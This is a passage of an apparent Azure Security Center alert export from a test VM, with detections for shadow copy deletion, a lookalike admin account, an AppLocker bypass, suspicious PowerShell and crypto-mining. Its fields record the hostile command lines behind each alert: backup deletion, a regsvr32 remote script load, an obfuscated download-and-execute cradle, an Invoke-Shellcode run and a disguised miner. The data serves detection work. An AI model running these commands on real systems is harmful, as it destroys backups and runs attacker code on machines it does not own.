""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
166,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:17,2019-01-15 17:15:17,6a71b543-4832-4658-8467-825aeafbe031,2518547282825448815_6a71b543-4832-4658-8467-825aeafbe031,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware, and specifically ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1be8"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=JbKldE2C8FDd%2FqIgj7Pb53OzH9DT9YTgPqjd%2F15j9b4%3D&spr=https&st=2019-01-15T11:50:23Z&se=2019-04-15T12:05:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1be8"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""EndTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
167,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:03,2019-01-15 17:15:03,3db7e1e7-2edc-4dd9-8c1d-d908f5b8a904,2518547282966696689_3db7e1e7-2edc-4dd9-8c1d-d908f5b8a904,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator: this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b7c"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x1b7c"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""EndTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:07,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
168,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,82730ffa-b9ce-43f4-bf3c-a97113107cc5,2518547282896095305_82730ffa-b9ce-43f4-bf3c-a97113107cc5,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xd54"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xd54"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
169,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,31ae6eeb-bd1d-4018-8df9-eeedd60bf1ab,2518547282883193041_31ae6eeb-bd1d-4018-8df9-eeedd60bf1ab,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f4"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f4"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
170,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,ed5bcf39-ffd3-468a-82e3-28e108d4f06f,2518547282881581273_ed5bcf39-ffd3-468a-82e3-28e108d4f06f,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1724"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1724"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
171,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:12,2019-01-15 17:15:12,bd1a0865-a507-4e2b-b8df-613238a950df,2518547282874783943_bd1a0865-a507-4e2b-b8df-613238a950df,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1848"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1848"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""EndTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
172,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,35c8d588-ddf7-46b5-a0bf-f47023f9343c,2518547282892925953_35c8d588-ddf7-46b5-a0bf-f47023f9343c,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b8c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b8c"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
173,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,d65aa787-e867-43b1-9182-025a1a38173a,2518547282880013417_d65aa787-e867-43b1-9182-025a1a38173a,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1be4"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1be4"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
174,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,0073e6d8-6c2e-42e4-8966-d1f5a3dd3517,2518547282892925953_0073e6d8-6c2e-42e4-8966-d1f5a3dd3517,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,"Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign, attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.",High,False,"{
""Account Session Id"": ""0x1bd592e"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1b8c"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
